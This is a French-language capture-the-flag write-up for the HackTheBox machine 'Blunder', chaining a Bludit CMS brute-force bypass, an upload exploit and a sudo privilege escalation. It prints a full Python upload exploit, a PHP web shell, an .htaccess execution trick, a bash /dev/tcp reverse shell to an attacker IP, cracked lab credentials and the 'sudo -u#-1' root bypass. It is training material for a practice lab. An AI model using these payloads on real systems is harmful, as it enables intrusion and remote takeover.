Blunder HackTheBox (Writeup)

Skills:

Bludit CMS Exploitation
Bypassing IP Blocking (X-Forwarded-For Header)
Directory Traversal Image File Upload (Playing with .htaccess)
Abusing sudo privilege (CVE-2019-14287)

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn --min-rate 5000 10.10.10.191 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (80)

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p80 10.10.10.191 -oN targeted

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP:

Port 80 (Blunder):

Scan de répertoires

Utilisez Gobuster pour trouver des répertoires intéressants :

gobuster dir -u http://blunder.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Résultat : Découverte du répertoire /admin.

Identification du CMS

En accédant à /admin, le CMS Bludit (version 3.9.2) est détecté.

Exploitation de Bludit CMS

Recherche de vulnérabilités

Utilisez searchsploit pour trouver des vulnérabilités connues :

Vulnérabilité détectée : CVE-2019-17240

L'exploit vise à exploiter une vulnérabilité dans la mitigation des attaques par force brute sur Bludit, une plateforme CMS (Content Management System). La vulnérabilité, identifiée comme CVE-2019-17240, permet à un attaquant de contourner les protections contre les attaques par force brute mises en œuvre dans les versions de Bludit antérieures ou égales à la 3.9.2.

searchsploit -m php/webapps/48942.py

Fichier texte trouvé

Effectuez une recherche supplémentaire avec Gobuster :

gobuster dir -u http://blunder.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -x php,txt,html

Contenu : Utilisateur identifié : fergus.

Brute Force sur Bludit

Une fois l’utilisateur fergus découvert, utilisez un dictionnaire pour lancer une attaque par force brute :

python3 exploit.py -l http://blunder.htb/admin/ -u user.txt -p password.txt

Aucune correspondance trouvée avec le fichier rockyou.txt.

Dictionnaire personnalisé

Utilisez Cewl pour générer un dictionnaire basé sur le site web :

cewl -u http://blunder.htb/ -w password.txt

Relancez l’attaque brute force avec le dictionnaire personnalisé :

Mot de passe trouvé : fergus:RolandDeschain

Explotation Directory Traversal Image File Upload:

Une fois authentifié, ce CMS est vulnérable à une attaque de type Directory Traversal permettant l'upload de fichiers malveillants.

Bludit v3.9.2 Code Execution Vulnerability in "Upload function" · Issue #1081 · bludit/bluditGitHub

Nous pouvons spécifier l'emplacement du fichier téléchargé en modifiant la valeur du uuid, puis charger une image malveillante dans le dossier temporaire.

Après l'authentification, il est possible de télécharger un nouvel exploit via searchsploit dans multiple/webapps/48701.txt, qui fournit les étapes pour exploiter cette vulnérabilité.

Étapes pour l'exploitation

Créer un fichier malveillant (evil.png) contenant du code PHP :

<?php
system($_GET['cmd']);
?>

Modifier le script pour l'adapter à la situation (adresse IP de la victime, nom d'utilisateur, mot de passe...).

Exécuter l'exploit:

Script Python d'exploitation :

#!/usr/bin/env python3

import requests
import re
import argparse
import random
import string
import base64
from requests.exceptions import Timeout

url = 'http://blunder.htb/admin'  # CHANGE ME
username = 'fergus'  # CHANGE ME
password = 'RolandDeschain'  # CHANGE ME

# msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=53 -f raw -b '"' > evil.png
# echo -e "<?php $(cat evil.png)" > evil.png
payload = 'evil.png'  # CREATE ME

#echo "RewriteEngine off" > .htaccess
#echo "AddType application/x-httpd-php .png" >> .htaccess
payload2 = '.htaccess'  # CREATE ME

def login(url,username,password):
    """ Log in with provided admin creds, grab the cookie once authenticated """

    session = requests.Session()
    login_page = session.get(url + "/admin/")
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"',
                           login_page.text
                 ).group(1)
    cookie = ((login_page.headers["Set-Cookie"]).split(";")[0].split("=")[1])
    data = {"save":"",
            "password":password,
            "tokenCSRF":csrf_token,
            "username":username}
    headers = {"Origin":url,
               "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
               "Upgrade-Insecure-Requests":"1",
               "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Connection":"close",
               "Referer": url + "/admin/",
               "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
               "Accept-Encoding":"gzip, deflate",
               "Content-Type":"application/x-www-form-urlencoded"
    }
    cookies = {"BLUDIT-KEY":cookie}
    response = session.post(url + "/admin/",
                            data=data,
                            headers=headers,
                            cookies=cookies,
                            allow_redirects = False
               )

    print("cookie: " + cookie)
    return cookie

def get_csrf_token(url,cookie):
    """ Grab the CSRF token from an authed session """

    session = requests.Session()
    headers = {"Origin":url,
               "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
               "Upgrade-Insecure-Requests":"1",
               "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Connection":"close",
               "Referer":url + "/admin/",
               "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
               "Accept-Encoding":"gzip, deflate"}
    cookies = {"BLUDIT-KEY":cookie}
    response = session.get(url + "/admin/dashboard",
                           headers=headers,
                           cookies=cookies
               )
    csrf_token = response.text.split('var tokenCSRF = "')[1].split('"')[0]

    print("csrf_token: " + csrf_token)
    return csrf_token

def upload_evil_image(url, cookie, csrf_token, payload, override_uuid=False):
    """ Upload files required for to execute PHP from malicious image files. Payload and .htaccess """

    session = requests.Session()
    files= {"images[]": (payload,
                         open(payload, "rb"),
                         "multipart/form-data",
                         {"Content-Type": "image/png", "filename":payload}
                        )}
    if override_uuid:
        data = {"uuid": "../../tmp/temp",
                "tokenCSRF":csrf_token}
    else:
        # On the vuln app, this line occurs first:
        # Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename);
        # Even though there is a file extension check, it won't really stop us
        # from uploading the .htaccess file.
        data = {"tokenCSRF":csrf_token}
    headers = {"Origin":url,
               "Accept":"*/*",
               "X-Requested-With":"XMLHttpRequest",
               "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0",
               "Connection":"close",
               "Referer":url + "/admin/new-content",
               "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
               "Accept-Encoding":"gzip, deflate",
    }
    cookies = {"BLUDIT-KEY":cookie}
    response = session.post(url + "/admin/ajax/upload-images", data=data, files=files, headers=headers, cookies=cookies)
    print("Uploading payload: " + payload)

if __name__ == "__main__":
    cookie = login(url, username, password)
    token = get_csrf_token(url, cookie)
    upload_evil_image(url, cookie, token, payload, True)
    upload_evil_image(url, cookie, token, payload2)

Accéder au fichier malveillant : Une fois l'image téléchargée, il suffit de se rendre sur /bl-content/tmp/temp/evil.png pour exécuter des commandes.

Écouter sur le port 443 avec Netcat :

nc -nvlp 443

Exécuter une reverse shell :

bash -c "bash -i >%26 /dev/tcp/10.10.14.2/443 0>%261"

Gestion de la session terminal :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Élévation de privilèges

En explorant les fichiers, on découvre un fichier users.php dans le dossier databases contenant des identifiants hachés pour les utilisateurs fergus et admin :

admin:bfcc887f62e36ea019e3295aafb8a3885966e265

fergus:be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7

En utilisant CrackStation pour tenter de cracker ces hachages, il apparaît que ceux-ci ne sont pas reconnus.

En revanche, à la racine du site internet, une version plus récente de Bludit est trouvée, contenant les mêmes fichiers de configuration, mais avec des identifiants différents :

hugo : faca404fd5c0a31cf1897b823c695c85cffeb98d

hugo:Password120

Flag user.txt:

Abusing sudo privilege (CVE-2019-14287):

Lors de l'examen des privilèges sudo, nous avons découvert une configuration vulnérable dans le fichier sudoers. En utilisant la commande sudo -l, nous avons identifié un privilège qui permet de se connecter à tous les utilisateurs, sauf root, avec la commande /bin/bash :

sudo 1.8.27 - Security BypassExploit Database

Cette vulnérabilité affecte toutes les versions de sudo antérieures à la version 1.8.27.

Dans notre cas, la version de sudo est inférieure à 1.8.27, ce qui rend cette vulnérabilité exploitable.

Pour exploiter cette vulnérabilité, il suffit d'exécuter la commande suivante :

sudo -u#-1 /bin/bash

Cette commande permet d'exécuter une shell en tant que l'utilisateur -1, ce qui correspond à l'utilisateur root.

Flag root.txt :)

Mis à jour il y a 1 an

hashtagReconnaissance:

hashtagPort 80 (Blunder):

hashtagExploitation de Bludit CMS

hashtagVulnérabilité détectée : CVE-2019-17240

hashtagBrute Force sur Bludit

hashtagDictionnaire personnalisé

hashtagExplotation Directory Traversal Image File Upload:

hashtagÉlévation de privilèges

hashtagFlag user.txt:

hashtagAbusing sudo privilege (CVE-2019-14287):

hashtagFlag root.txt :)